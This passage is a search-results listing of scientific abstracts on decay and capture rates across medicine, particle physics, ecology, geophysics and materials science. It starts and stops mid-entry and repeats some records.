during-kangaroo care, and post-kangaroo care data were retrieved in infants with at least 10 accurately annotated kangaroo care sessions. Eight HRV features (5 in the time domain and 3 in the frequency domain) were used to visually and statistically compare the pre-kangaroo care and during-kangaroo care periods. Two of these features, capturing the percentage of heart rate decelerations and the extent of heart rate decelerations, were newly developed for preterm infants. A total of 191 kangaroo care sessions were investigated in 11 preterm infants. Despite clinically irrelevant changes in vital signs, 6 of the 8 HRV features (SD of normal-to-normal intervals, root mean square of the SD, percentage of consecutive normal-to-normal intervals that differ by >50 ms, SD of heart rate decelerations, high-frequency power, and low-frequency/high-frequency ratio) showed a visible and statistically significant difference (P <.01) between stable periods of kangaroo care and pre-kangaroo care. HRV was reduced during kangaroo care owing to a decrease in the extent of transient heart rate decelerations. HRV-based features may be clinically useful for capturing the dynamic changes in autonomic regulation in response to kangaroo care and other changes in environment and state. Copyright © 2016 Elsevier Inc. All rights reserved. 20. Effects of Purge-Flow Rate on Microbubble Capture in Radial Arterial-Line Filters. PubMed Herbst, Daniel P 2016-09-01 The process of microbubble filtration from blood is complex and highly dependent on the forces of flow and buoyancy. To protect the patient from air emboli, arterial-line filters commonly use a micropore screen, a large volume housing with purpose-built shape, and a purge port to trap, separate, and remove circulating microbubbles. Although it has been proposed that an insufficient buoyancy force renders the purge port ineffective at removing microbubbles smaller than 500 μm, this research attempts to investigate the purge flow of an arterial-line filter to better understand the microbubble removal function in a typical radial filter design. As its primary objective, the study aims to determine the effect of purge-flow rate on bubble capture using air bolus injections from a syringe pump with 22-gauge needle and Doppler ultrasound bubble detection. The measureable bubble size generated in the test circuit ranged between 30 and 500 μm, while purge flow was varied between .1 and .5 L/min for testing. Statistical analysis of the test data was handled using a repeated measures design with significance set at p < .05 level. Outcomes demonstrated that higher purge flows yielded higher bubble counts, but the effect of purge-flow rate on bubble capture decreased as bubble size increased. Results also showed that purge flow from the test filter was capable of capturing all bubble sizes being generated over the entire flow range tested, and confirms utility of the purge port in removing microbubbles smaller than 500 μm. By analyzing bubble counts in the purge flow of a typical radial-filter design, this study demonstrates that currently available micropore filter technology is capable of removing the size range of bubbles that commonly pass through modern pump-oxygenator systems and should continue to be considered during extracorporeal circulation as a measure to improve patient safety. 1. Effects of Purge-Flow Rate on Microbubble Capture in Radial Arterial-Line Filters PubMed Central Herbst, Daniel P. 2016-01-01 Abstract: The process of microbubble filtration from blood is complex and highly dependent on the forces of flow and buoyancy. To protect the patient from air emboli, arterial-line filters commonly use a micropore screen, a large volume housing with purpose-built shape, and a purge port to trap, separate, and remove circulating microbubbles. Although it has been proposed that an insufficient buoyancy force renders the purge port ineffective at removing microbubbles smaller than 500 μm, this research attempts to investigate the purge flow of an arterial-line filter to better understand the microbubble removal function in a typical radial filter design. As its primary objective, the study aims to determine the effect of purge-flow rate on bubble capture using air bolus injections from a syringe pump with 22-gauge needle and Doppler ultrasound bubble detection. The measureable bubble size generated in the test circuit ranged between 30 and 500 μm, while purge flow was varied between .1 and .5 L/min for testing. Statistical analysis of the test data was handled using a repeated measures design with significance set at p < .05 level. Outcomes demonstrated that higher purge flows yielded higher bubble counts, but the effect of purge-flow rate on bubble capture decreased as bubble size increased. Results also showed that purge flow from the test filter was capable of capturing all bubble sizes being generated over the entire flow range tested, and confirms utility of the purge port in removing microbubbles smaller than 500 μm. By analyzing bubble counts in the purge flow of a typical radial-filter design, this study demonstrates that currently available micropore filter technology is capable of removing the size range of bubbles that commonly pass through modern pump-oxygenator systems and should continue to be considered during extracorporeal circulation as a measure to improve patient safety. PMID:27729703 2. V sup 0 r arrow P sup 0 P sup 0. gamma. decay rates SciTech Connect Fajfer, S. ); Oakes, R.J. ) 1990-10-01 The radiative decay processes of the type {ital V}{sup 0}{r arrow}{ital P}{sup 0}{ital P}{sup 0}{gamma} are described by the gauged Wess-Zumino terms in a low-energy effective Lagrangian, there being no bremsstrahlung contributions. Using such an effective Lagrangian, describing pseudoscalar and vector mesons, we have calculated the branching ratios for the decays {omega}{r arrow}{pi}{sup 0}{pi}{sup 0}{gamma}, {omega}{r arrow}{pi}{sup 0}{eta}{gamma}, {rho}{r arrow}{pi}{sup 0}{pi}{sup 0}{gamma}, {rho}{r arrow}{pi}{sup 0}{eta}{gamma}, {phi}{r arrow}{pi}{sup 0}{pi}{sup 0}{gamma}, {phi}{r arrow}{pi}{sup 0}{eta}{gamma}, and {phi}{r arrow}{ital K}{sup 0}{ital {bar K}}{sup 0}{gamma}. Since scalar mesons have been neglected, these rates provide estimates of the expected backgrounds in searches for {ital J}{sup {pi}}=0{sup +} resonances, particularly the possible four-quark states in {phi} decays. 3. The impact of sea-level rise on organic matter decay rates in Chesapeake Bay brackish tidal marshes USGS Publications Warehouse Kirwanm, M.L.; Langley, J.A.; Guntenspergen, Gleen R.; Megonigal, J.P. 2013-01-01 The balance between organic matter production and decay determines how fast coastal wetlands accumulate soil organic matter. Despite the importance of soil organic matter accumulation rates in influencing marsh elevation and resistance to sea-level rise, relatively little is known about how decomposition rates will respond to sea-level rise. Here, we estimate the sensitivity of decomposition to flooding by measuring rates of decay in 87 bags filled with milled sedge peat, including soil organic matter, roots and rhizomes. Experiments were located in field-based mesocosms along 3 mesohaline tributaries of the Chesapeake Bay. Mesocosm elevations were manipulated to influence the duration of tidal inundation. Although we found no significant influence of inundation on decay rate when bags from all study sites were analyzed together, decay rates at two of the sites increased with greater flooding. These findings suggest that flooding may enhance organic matter decay rates even in water-logged soils, but that the overall influence of flooding is minor. Our experiments suggest that sea-level rise will not accelerate rates of peat accumulation by slowing the rate of soil organic matter decay. Consequently, marshes will require enhanced organic matter productivity or mineral sediment deposition to survive accelerating sea-level rise. 4. Astrophysical reaction rates for {sup 58,60}Ni(n,{gamma}) from new neutron capture cross section measurements SciTech Connect Guber, K. H.; Derrien, H.; Leal, L. C.; Arbanas, G.; Wiarda, D.; Koehler, P. E.; Harvey, J. A. 2010-11-15 New neutron capture cross sections of {sup 58,60}Ni were measured in the energy range from 100 eV to 600 keV using the Oak Ridge Electron Linear Accelerator. The combination of these new neutron capture data with previous transmission data allowed a resonance analysis up to 900 keV using R-matrix theory. The theoretically determined direct capture cross sections were included in the analyses. From these resonance parameters and the direct capture contribution, new (n,{gamma}) astrophysical reaction rates were determined over the entire energy range needed by the latest stellar models describing the so-called weak s process. 5. Effect of fungal decay on the hygroscopic thickness swelling rate of lignocellulosic filler-polyolefin biocomposites Kord, B.; Hosseinihashemi, S. Kh. 2014-01-01 The influence of fungal decay on the hygroscopic thickness swelling rate of lignocellulosic filler-polyolefin biocomposites has been investigated. Composites based on polypropylene (PP), bagasse fiber (BF), and a coupling agent (PP-g-MA) were made by melt compounding and injection molding. The weigt ratio of BF to PP was controlled at 60/40 for all blends. The amount of coupling agent was fixed at 2% for all formulations. The samples obtained were exposed to the action of brown-rot (Coniophora puteana) and white-rot (Trametes versicolor) fungi for 8, 12, and 16 weeks according to the Kolle-flask method. The thickness swelling of the samples was evaluated by immersing them in water at room temperature for several weeks. The morphology of the composites was characterized using the scanning electron microscopy (SEM). The results indicated that the fungal decay had an adverse affect on the dimensional stability of BF/PP composites due to an increase in the thickness swelling rate. The thickness swelling of white-rotted samples was higher than that of brown-rotted ones and control samples. Also, the thickness swelling of BF/PP composites increased with increasing time of fungal decay. In addition, after 16 weeks of exposure to white-rot fungi, the composites exhibited a higher parameter of swelling rate K SR than control samples. The K SR of the composites was influenced both by the type of rooting and the exposure time. Furthermore, the SEM micrographs showed that the extent of degradation increased with growing exposure time to fungi. 6. Rate-dependent interface capture beyond the coffee-ring effect Li, Yanan; Yang, Qiang; Li, Mingzhu; Song, Yanlin 2016-04-01 The mechanism of droplet drying is a widely concerned fundamental issue since controlling the deposition morphology of droplet has significant influence on printing, biology pattern, self-assembling and other solution-based devices fabrication. Here we reveal a striking different kinetics-controlled deposition regime beyond the ubiquitous coffee-ring effect that suspended particles tend to kinetically accumulate at the air-liquid interface and deposit uniformly. As the interface shrinkage rate exceeds the particle average diffusion rate, particles in vertical evaporation flow will be captured by the descending surface, producing surface particle jam and forming viscous quasi-solid layer, which dramatically prevents the trapped particles from being transported to drop edge and results in uniform deposition. This simple, robust drying regime will provide a versatile strategy to control the droplet deposition morphology, and a novel direction of interface assembling for fabricating superlattices and high quality photonic crystal patterns. 7. Rate-dependent interface capture beyond the coffee-ring effect PubMed Central Li, Yanan; Yang, Qiang; Li, Mingzhu; Song, Yanlin 2016-01-01 The mechanism of droplet drying is a widely concerned fundamental issue since controlling the deposition morphology of droplet has significant influence on printing, biology pattern, self-assembling and other solution-based devices fabrication. Here we reveal a striking different kinetics-controlled deposition regime beyond the ubiquitous coffee-ring effect that suspended particles tend to kinetically accumulate at the air-liquid interface and deposit uniformly. As the interface shrinkage rate exceeds the particle average diffusion rate, particles in vertical evaporation flow will be captured by the descending surface, producing surface particle jam and forming viscous quasi-solid layer, which dramatically prevents the trapped particles from being transported to drop edge and results in uniform deposition. This simple, robust drying regime will provide a versatile strategy to control the droplet deposition morphology, and a novel direction of interface assembling for fabricating superlattices and high quality photonic crystal patterns. PMID:27090820 8. Comparison of nonmesonic hypernuclear decay rates computed in laboratory and center-of-mass coordinates SciTech Connect De Conti, C.; Barbero, C.; Galeão, A. P.; Krmpotić, F. 2014-11-11 In this work we compute the one-nucleon-induced nonmesonic hypernuclear decay rates of {sub Λ}{sup 5}He, {sub Λ}{sup 12}C and {sub Λ}{sup 13}C using a formalism based on the independent particle shell model in terms of laboratory coordinates. To ascertain the correctness and precision of the method, these results are compared with those obtained using a formalism in terms of center-of-mass coordinates, which has been previously reported in the literature. The formalism in terms of laboratory coordinates will be useful in the shell-model approach to two-nucleon-induced transitions. 9. Precision measurement of the ratio of the charged kaon leptonic decay rates NA62 Collaboration; Lazzeroni, C.; Romano, A.; Ceccucci, A.; Danielsson, H.; Falaleev, V.; Gatignon, L.; Goy Lopez, S.; Hallgren, B.; Maier, A.; Peters, A.; Piccini, M.; Riedler, P.; Frabetti, P. L.; Gersabeck, E.; Kekelidze, V.; Madigozhin, D.; Misheva, M.; Molokanova, N.; Movchan, S.; Potrebenikov, Yu.; Shkarovskiy, S.; Zinchenko, A.; Rubin, P.; Baldini, W.; Cotta Ramusino, A.; Dalpiaz, P.; Fiorini, M.; Gianoli, A.; Norton, A.; Petrucci, F.; Savrié, M.; Bizzeti, A.; Bucci, F.; Iacopini, E.; Lenti, M.; Veltri, M.; Antonelli, A.; Moulson, M.; Raggi, M.; Spadaro, T.; Eppard, K.; Hita-Hochgesand, M.; Kleinknecht, K.; Renk, B.; Wanke, R.; Winhart, A.; Winston, R.; Bolotov, V.; Duk, V.; Gushchin, E.; Ambrosino, F.; Di Filippo, D.; Massarotti, P.; Napolitano, M.; Palladino, V.; Saracino, G.; Anzivino, G.; Imbergamo, E.; Piandani, R.; Sergi, A.; Cenci, P.; Pepe, M.; Costantini, F.; Doble, N.; Giudici, S.; Pierazzini, G.; Sozzi, M.; Venditti, S.; Balev, S.; Collazuol, G.; DiLella, L.; Gallorini, S.; Goudzovski, E.; Lamanna, G.; Mannelli, I.; Ruggiero, G.; Cerri, C.; Fantechi, R.; Kurshetsov, V.; Obraztsov, V.; Popov, I.; Semenov, V.; Yushchenko, O.; D'Agostini, G.; Leonardi, E.; Serra, M.; Valente, P.; Fucci, A.; Salamon, A.; Bloch-Devaux, B.; Peyaud, B.; Engelfried, J.; Coward, D.; Kozhuharov, V.; Litov, L.; Arcidiacono, R.; Bifani, S.; Biino, C.; Dellacasa, G.; Marchetto, F.; Numao, T.; Retière, F. 2013-02-01 A precision measurement of the ratio RK of the rates of kaon leptonic decays K±→e±ν and K±→μ±ν with the full data sample collected by the NA62 experiment at CERN in 2007-2008 is reported. The result, obtained by analysing ˜150000 reconstructed K±→e±ν candidates with 11% background contamination, is RK=(2.488±0.010)×10-5, in agreement with the Standard Model expectation. 10. Precision measurement of the ratio of the charged kaon leptonic decay rates Lazzeroni, C.; Romano, A.; Ceccucci, A.; Danielsson, H.; Falaleev, V.; Gatignon, L.; Goy Lopez, S.; Hallgren, B.; Maier, A.; Peters, A.; Piccini, M.; Riedler, P.; Frabetti, P. L.; Gersabeck, E.; Kekelidze, V.; Madigozhin, D.; Misheva, M.; Molokanova, N.; Movchan, S.; Potrebenikov, Yu.; Shkarovskiy, S.; Zinchenko, A.; Rubin, P.; Baldini, W.; Cotta Ramusino, A.; Dalpiaz, P.; Fiorini, M.; Gianoli, A.; Norton, A.; Petrucci, F.; Savrié, M.; Bizzeti, A.; Bucci, F.; Iacopini, E.; Lenti, M.; Veltri, M.; Antonelli, A.; Moulson, M.; Raggi, M.; Spadaro, T.; Eppard, K.; Hita-Hochgesand, M.; Kleinknecht, K.; Renk, B.; Wanke, R.; Winhart, A.; Winston, R.; Bolotov, V.; Duk, V.; Gushchin, E.; Ambrosino, F.; Di Filippo, D.; Massarotti, P.; Napolitano, M.; Palladino, V.; Saracino, G.; Anzivino, G.; Imbergamo, E.; Piandani, R.; Sergi, A.; Cenci, P.; Pepe, M.; Costantini, F.; Doble, N.; Giudici, S.; Pierazzini, G.; Sozzi, M.; Venditti, S.; Balev, S.; Collazuol, G.; DiLella, L.; Gallorini, S.; Goudzovski, E.; Lamanna, G.; Mannelli, I.; Ruggiero, G.; Cerri, C.; Fantechi, R.; Kurshetsov, V.; Obraztsov, V.; Popov, I.; Semenov, V.; Yushchenko, O.; D'Agostini, G.; Leonardi, E.; Serra, M.; Valente, P.; Fucci, A.; Salamon, A.; Bloch-Devaux, B.; Peyaud, B.; Engelfried, J.; Coward, D.; Kozhuharov, V.; Litov, L.; Arcidiacono, R.; Bifani, S.; Biino, C.; Dellacasa, G.; Marchetto, F.; Numao, T.; Retière, F.; NA62 Collaboration 2013-02-01 A precision measurement of the ratio RK of the rates of kaon leptonic decays K± →e± ν and K± →μ± ν with the full data sample collected by the NA62 experiment at CERN in 2007-2008 is reported. The result, obtained by analysing ∼ 150 000 reconstructed K± →e± ν candidates with 11% background contamination, is RK = (2.488 ± 0.010) ×10-5, in agreement with the Standard Model expectation. 11. An Examination of Sunspot Number Rates of Growth and Decay in Relation to the Sunspot Cycle NASA Technical Reports Server (NTRS) Wilson, Robert M.; Hathaway, David H. 2006-01-01 On the basis of annual sunspot number averages, sunspot number rates of growth and decay are examined relative to both minimum and maximum amplitudes and the time of their occurrences using cycles 12 through present, the most reliably determined sunspot cycles. Indeed, strong correlations are found for predicting the minimum and maximum amplitudes and the time of their occurrences years in advance. As applied to predicting sunspot minimum for cycle 24, the next cycle, its minimum appears likely to occur in 2006, especially if it is a robust cycle similar in nature to cycles 17-23. 12. Experimental Investigations of Changes in β-Decay Rate of 60Co and 137Cs Baurov, Yu. A.; Konradov, A. A.; Kushniruk, V. F.; Kuznetsov, E. A.; Sobolev, Yu. G.; Ryabov, Yu. V.; Senkevich, A. P.; Zadorozsny, S. V. Results of simultaneous measurements of β-decay rate with the aid of Ge(Li)-detectors performed at two laboratories 140 km apart (INR RAS, Troitsk, 60Co, and JINR, Dubna, 137Cs) from 15 March 2000 to 10 April 2000 are presented. Regular deviations of the count rate of γ-quanta following the β-decay of ~0.7% (INR RAS, 60Co) and ~0.2% (JINR, 137Cs) from the statistical average, are observed. The analysis of extremum deviations of γ--quanta count rate shows that the set of directions of tangents to the Earth's parallels of latitude at the extremum points of trajectories of motion in the space of each laboratory clearly forms three separate compact subsets of directions which agree, for two laboratories, to an accuracy of +/-10°. This phenomenon is shown not to be explained on the basis of traditional notion. A possible explanation is suggested based on the hypothesis that there exists a new anisotropic interaction caused by the cosmological vectorial potential Ag, a new fundamental constant having, according to the experiments carried out, the coordinate of right ascension α ~ 285° in the second equatorial system. This is in agreement with earlier experiments. 13. Ex vivo radioactive counts and decay rates of tissues resected during radioguided parathyroidectomy. PubMed Olson, Jordan; Repplinger, Dan; Bianco, Jesus; Chen, Herbert 2006-12-01 14. Global observation of Omori-law decay in the rate of triggered earthquakes Parsons, T. 2001-12-01 Triggered earthquakes can be large, damaging, and lethal as evidenced by the 1999 shocks in Turkey and the 2001 events in El Salvador. In this study, earthquakes with M greater than 7.0 from the Harvard CMT catalog are modeled as dislocations to calculate shear stress changes on subsequent earthquake rupture planes near enough to be affected. About 61% of earthquakes that occurred near the main shocks are associated with calculated shear stress increases, while ~39% are associated with shear stress decreases. If earthquakes associated with calculated shear stress increases are interpreted as triggered, then such events make up at least 8% of the CMT catalog. Globally, triggered earthquakes obey an Omori-law rate decay that lasts between ~7-11 years after the main shock. Earthquakes associated with calculated shear stress increases occur at higher rates than background up to 240 km away from the main-shock centroid. Earthquakes triggered by smaller quakes (foreshocks) also obey Omori's law, which is one of the few time-predictable patterns evident in the global occurrence of earthquakes. These observations indicate that earthquake probability calculations which include interactions from previous shocks should incorporate a transient Omori-law decay with time. In addition, a very simple model using the observed global rate change with time and spatial distribution of triggered earthquakes can be applied to immediately assess the likelihood of triggered earthquakes following large events, and can be in place until more sophisticated analyses are conducted. 15. Thermal decay analysis of fiber Bragg gratings at different temperature annealing rates using demarcation energy approximation Gunawardena, Dinusha Serandi; Lai, Man-Hong; Lim, Kok-Sing; Ahmad, Harith 2017-03-01 In this study the thermal degradation of gratings inscribed in three types of fiber namely, PS 1250/1500, SM 1500 and zero water peak single mode fiber is demonstrated. A comparative investigation is carried out on the aging characteristics of the gratings at three different temperature ramping rates of 3 °C/min, 6 °C/min and 9 °C/min. During the thermal annealing treatment, a significant enhancement in the grating reflectivity is observed for PS 1250/1500 fiber from ∼1.2 eV until 1.4 eV which indicates a thermal induced reversible effect. Higher temperature ramping rates lead to a higher regeneration temperature. In addition, the investigation also reflects that regardless of the temperature ramping rate the thermal decay behavior of a specific fiber can be successfully characterized when represented in a demarcation energy domain. Moreover, this technique can be accommodated when predicting the thermal decay characteristics of a specific fiber. 16. Age-specificity of black-capped chickadee survival rates: Analysis of capture-recapture data USGS Publications Warehouse Loery, G.; Pollock, K.H.; Nichols, J.D.; Hines, J.E. 1987-01-01 17. Additional experimental evidence for a solar influence on nuclear decay rates Jenkins, Jere H.; Herminghuysen, Kevin R.; Blue, Thomas E.; Fischbach, Ephraim; Javorsek, Daniel; Kauffman, Andrew C.; Mundy, Daniel W.; Sturrock, Peter A.; Talnagi, Joseph W. 2012-09-01 Additional experimental evidence is presented in support of the recent hypothesis that a possible solar influence could explain fluctuations observed in the measured decay rates of some isotopes. These data were obtained during routine weekly calibrations of an instrument used for radiological safety at The Ohio State University Research Reactor using 36Cl. The detector system used was based on a Geiger-Müller gas detector, which is a robust detector system with very low susceptibility to environmental changes. A clear annual variation is evident in the data, with a maximum relative count rate observed in January/February, and a minimum relative count rate observed in July/August, for seven successive years from July 2005 to June 2011. This annual variation is not likely to have arisen from changes in the detector surroundings, as we show here. 18. Analysis of flow decay potential on Galileo. [oxidizer flow rate reduction by iron nitrate precipitates NASA Technical Reports Server (NTRS) Cole, T. W.; Frisbee, R. H.; Yavrouian, A. H. 1987-01-01 The risks posed to the NASA's Galileo spacecraft by the oxidizer flow decay during its extended mission to Jupiter is discussed. The Galileo spacecraft will use nitrogen tetroxide (NTO)/monomethyl hydrazine bipropellant system with one large engine thrust-rated at a nominal 400 N, and 12 smaller engines each thrust-rated at a nominal 10 N. These smaller thrusters, because of their small valve inlet filters and small injector ports, are especially vulnerable to clogging by iron nitrate precipitates formed by NTO-wetted stainless steel components. To quantify the corrosion rates and solubility levels which will be seen during the Galileo mission, corrosion and solubility testing experiments were performed with simulated Galileo materials, propellants, and environments. The results show the potential benefits of propellant sieving in terms of iron and water impurity reduction. 19. Viral decay and viral production rates in continental-shelf and deep-sea sediments of the Mediterranean Sea. PubMed Corinaldesi, Cinzia; Dell'Anno, Antonio; Magagnini, Mirko; Danovaro, Roberto 2010-05-01 Here, for the first time, we have carried out synoptic measurements of viral production and decay rates in continental-shelf and deep-sea sediments of the Mediterranean Sea to explore the viral balance. The net viral production and decay rates (1.1-61.2 and 0.6-13.5 x 10(7) viruses g(-1) h(-1), respectively) were significantly correlated, and were also related to prokaryotic heterotrophic production. The addition of enzymes increased the decay rates in the surface sediments, but not in the subsurface sediments. Both the viral production and the decay rates decreased significantly in the deeper sediment layers, while the virus-to-prokaryote abundance ratio increased, suggesting a high preservation of viruses in the subsurface sediments. Viral decay did not balance viral production at any of the sites investigated, accounting on average for c. 32% of the gross viral production in the marine sediments. We estimate that the carbon (C) released by viral decay contributed 6-23% to the total C released by the viral shunt. Because only c. 2% of the viruses produced can infect other prokaryotes, the majority is not subjected to direct lysis and potentially remains as a food source for benthic consumers. The results reported here suggest that viral decay can play an important role in biogeochemical cycles and benthic trophodynamics. 20. Theoretical simulation of carrier capture and relaxation rates in quantum-dot semiconductor optical amplifiers SciTech Connect Wu, Yunhu; Zhang, Guoping; Guo, Ling; Qi, Guoqun; Li, Xiaoming 2014-06-14 Based on Auger scattering mechanism, carrier-carrier scattering dynamics between the two-dimensional carrier reservoir (also called wetting layer, i.e., WL) and the confined quantum dot ground and first excited state in quantum-dot semiconductor optical amplifiers (QD-SOAs) are investigated theoretically in this paper. The scattering rates for independent electron and hole densities are calculated. The results show an ultra-fast carrier capture (relaxation) rate up to 1 ps{sup −1}, and there is a complex dependence of the Coulomb scattering rates on the WL electron and hole densities. In addition, due to the different effective mass and the level distribution, the scattering rates for electron and hole are very different. Finally, in order to provide a direction to control (increase or decrease) the input current in realistic QD-SOA systems, a simple method is proposed to determine the trends of the carrier recovery rates with the WL carrier densities in the vicinity of the steady-state. 1. Search for D0-D(-)0 mixing and a measurement of the doubly Cabibbo-suppressed decay rate in D0-->Kpi decays. PubMed Aubert, B; Barate, R; Boutigny, D; Gaillard, J-M; Hicheur, A; Karyotakis, Y; Lees, J P; Robbe, P; Tisserand, V; Zghiche, A; Palano, A; Pompili, A; Chen, J C; Qi, N D; Rong, G; Wang, P; Zhu, Y S; Eigen, G; Ofte, I; Stugu, B; Abrams, G S; Borgland, A W; Breon, A B; Brown, D N; Button-Shafer, J; Cahn, R N; Charles, E; Day, C T; Gill, M S; Gritsan, A V; Groysman, Y; Jacobsen, R G; Kadel, R W; Kadyk, J; Kerth, L T; Kolomensky, Yu G; Kral, J F; Kukartsev, G; LeClerc, C; Levi, M E; Lynch, G; Mir, L M; Oddone, P J; Orimoto, T J; Pripstein, M; Roe, N A; Romosan, A; Ronan, M T; Shelkov, V G; Telnov, A V; Wenzel, W A; Harrison, T J; Hawkes, C M; Knowles, D J; Penny, R C; Watson, A T; Watson, N K; Deppermann, T; Goetzen, K; Koch, H; Lewandowski, B; Pelizaeus, M; Peters, K; Schmuecker, H; Steinke, M; Barlow, N R; Bhimji, W; Boyd, J T; Chevalier, N; Cottingham, W N; Mackay, C; Wilson, F F; Hearty, C; Mattison, T S; McKenna, J A; Thiessen, D; Kyberd, P; McKemey, A K; Blinov, V E; Bukin, A D; Golubev, V B; Ivanchenko, V N; Kravchenko, E A; Onuchin, A P; Serednyakov, S I; Skovpen, Yu I; Solodov, E P; Yushkov, A N; Best, D; Chao, M; Kirkby, D; Lankford, A J; Mandelkern, M; McMahon, S; Mommsen, R K; Roethel, W; Stoker, D P; Buchanan, C; Hadavand, H K; Hill, E J; MacFarlane, D B; Paar, H P; Rahatlou, Sh; Schwanke, U; Sharma, V; Berryhill, J W; Campagnari, C; Dahmes, B; Kuznetsova, N; Levy, S L; Long, O; Lu, A; Mazur, M A; Richman, J D; Verkerke, W; Beringer, J; Eisner, A M; Grothe, M; Heusch, C A; Lockman, W S; Schalk, T; Schmitz, R E; Schumm, B A; Seiden, A; Turri, M; Walkowiak, W; Williams, D C; Wilson, M G; Albert, J; Chen, E; Dorsten, M P; Dubois-Felsmann, G P; Dvoretskii, A; Hitlin, D G; Narsky, I; Porter, F C; Ryd, A; Samuel, A; Yang, S; Jayatilleke, S; Mancinelli, G; Meadows, B T; Sokoloff, M D; Barillari, T; Blanc, F; Bloom, P; Clark, P J; Ford, W T; Nauenberg, U; Olivas, A; Rankin, P; Roy, J; Smith, J G; van Hoek, W C; Zhang, L; Harton, J L; Hu, T; Soffer, A; Toki, W H; Wilson, R J; Zhang, J; Altenburg, D; Brandt, T; Brose, J; Colberg, T; Dickopp, M; Dubitzky, R S; Hauke, A; Lacker, H M; Maly, E; Müller-Pfefferkorn, R; Nogowski, R; Otto, S; Schubert, K R; Schwierz, R; Spaan, B; Wilden, L; Bernard, D; Bonneaud, G R; Brochard, F; Cohen-Tanugi, J; Thiebaux, Ch; Vasileiadis, G; Verderi, M; Khan, A; Lavin, D; Muheim, F; Playfer, S; Swain, J E; Tinslay, J; Bozzi, C; Piemontese, L; Sarti, A; Treadwell, E; Anulli, F; Baldini-Ferroli, R; Calcaterra, A; de Sangro, R; Falciai, D; Finocchiaro, G; Patteri, P; Peruzzi, I M; Piccolo, M; Zallo, A; Buzzo, A; Contri, R; Crosetti, G; Lo Vetere, M; Macri, M; Monge, M R; Passaggio, S; Pastore, F C; Patrignani, C; Robutti, E; Santroni, A; Tosi, S; Bailey, S; Morii, M; Grenier, G J; Lee, S-J; Mallik, U; Cochran, J; Crawley, H B; Lamsa, J; Meyer, W T; Prell, S; Rosenberg, E I; Yi, J; Davier, M; Grosdidier, G; Höcker, A; Laplace, S; Le Diberder, F; Lepeltier, V; Lutz, A M; Petersen, T C; Plaszczynski, S; Schune, M H; Tantot, L; Wormser, G; Bionta, R M; Brigljević, V; Cheng, C H; Lange, D J; Wright, D M; Bevan, A J; Fry, J R; Gabathuler, E; Gamet, R; Kay, M; Payne, D J; Sloane, R J; Touramanis, C; Aspinwall, M L; Bowerman, D A; Dauncey, P D; Egede, U; Eschrich, I; Morton, G W; Nash, J A; Sanders, P; Taylor, G P; Back, J J; Bellodi, G; Harrison, P F; Shorthouse, H W; Strother, P; Vidal, P B; Cowan, G; Flaecher, H U; George, S; Green, M G; Kurup, A; Marker, C E; McMahon, T R; Ricciardi, S; Salvatore, F; Vaitsas, G; Winter, M A; Brown, D; Davis, C L; Allison, J; Barlow, R J; Forti, A C; Hart, P A; Jackson, F; Lafferty, G D; Lyon, A J; Weatherall, J H; Williams, J C; Farbin, A; Jawahery, A; Kovalskyi, D; Lae, C K; Lillard, V; Roberts, D A; Blaylock, G; Dallapiccola, C; Flood, K T; Hertzbach, S S; Kofler, R; Koptchev, V B; Moore, T B; Staengle, H; Willocq, S; Cowan, R; Sciolla, G; Taylor, F; Yamamoto, R K; Mangeol, D J J; Milek, M; Patel, P M; Lazzaro, A; Palombo, F; Bauer, J M; Cremaldi, L; Eschenburg, V; Godang, R; Kroeger, R; Reidy, J; Sanders, D A; Summers, D J; Zhao, H W; Hast, C; Taras, P; Nicholson, H; Cartaro, C; Cavallo, N; De Nardo, G; Fabozzi, F; Gatto, C; Lista, L; Paolucci, P; Piccolo, D; Sciacca, C; Baak, M A; Raven, G; LoSecco, J M; Gabriel, T A; Brau, B; Pulliam, T; Brau, J; Frey, R; Iwasaki, M; Potter, C T; Sinev, N B; Strom, D; Torrence, E; Colecchia, F; Dorigo, A; Galeazzi, F; Margoni, M; Morandin, M; Posocco, M; Rotondo, M; Simonetto, F; Stroili, R; Tiozzo, G; Voci, C; Benayoun, M; Briand, H; Chauveau, J; David, P; de la Vaissière, Ch; Del Buono, L; Hamon, O; Leruste, Ph; Ocariz, J; Pivk, M; Roos, L; Stark, J; T'Jampens, S; Manfredi, P F; Re, V; Gladney, L; Guo, Q H; Panetta, J; Angelini, C; Batignani, G; Bettarini, S; Bondioli, M; Bucci, F; Calderini, G; Carpinelli, M; Forti, F; Giorgi, M A; Lusiani, A; Marchiori, G; Martinez-Vidal, F; Morganti, M; Neri, N; Paoloni, E; Rama, M; Rizzo, G; Sandrelli, F; Walsh, J; Haire, M; Judd, D; Paick, K; Wagoner, D E; Danielson, N; Elmer, P; Lu, C; Miftakov, V; Olsen, J; Smith, A J S; Varnes, E W; Bellini, F; Cavoto, G; del Re, D; Faccini, R; Ferrarotto, F; Ferroni, F; Gaspero, M; Leonardi, E; Mazzoni, M A; Morganti, S; Pierini, M; Piredda, G; Safai Tehrani, F; Serra, M; Voena, C; Christ, S; Wagner, G; Waldi, R; Adye, T; De Groot, N; Franek, B; Geddes, N I; Gopal, G P; Olaiya, E O; Xella, S M; Aleksan, R; Emery, S; Gaidot, A; Ganzhur, S F; Giraud, P-F; Hamel de Monchenault, G; Kozanecki, W; Langer, M; London, G W; Mayer, B; Schott, G; Vasseur, G; Yeche, Ch; Zito, M; Purohit, M V; Weidemann, A W; Yumiceva, F X; Aston, D; Bartoldus, R; Berger, N; Boyarski, A M; Buchmueller, O L; Convery, M R; Coupal, D P; Dong, D; Dorfan, J; Dujmic, D; Dunwoodie, W; Field, R C; Glanzman, T; Gowdy, S J; Grauges-Pous, E; Hadig, T; Halyo, V; Hryn'ova, T; Innes, W R; Jessop, C P; Kelsey, M H; Kim, P; Kocian, M L; Langenegger, U; Leith, D W G S; Luitz, S; Luth, V; Lynch, H L; Marsiske, H; Menke, S; Messner, R; Muller, D R; O'Grady, C P; Ozcan, V E; Perazzo, A; Perl, M; Petrak, S; Ratcliff, B N; Robertson, S H; Roodman, A; Salnikov, A A; Schindler, R H; Schwiening, J; Simi, G; Snyder, A; Soha, A; Stelzer, J; Su, D; Sullivan, M K; Tanaka, H A; Va'vra, J; Wagner, S R; Weaver, M; Weinstein, A J R; Wisniewski, W J; Wright, D H; Young, C C; Burchat, P R; Meyer, T I; Roat, C; Ahmed, S; Ernst, J A; Bugg, W; Krishnamurthy, M; Spanier, S M; Eckmann, R; Kim, H; Ritchie, J L; Schwitters, R F; Izen, J M; Kitayama, I; Lou, X C; Ye, S; Bianchi, F; Bona, M; Gallo, F; Gamba, D; Borean, C; Bosisio, L; Della Ricca, G; Dittongo, S; Grancagnolo, S; Lanceri, L; Poropat, P; 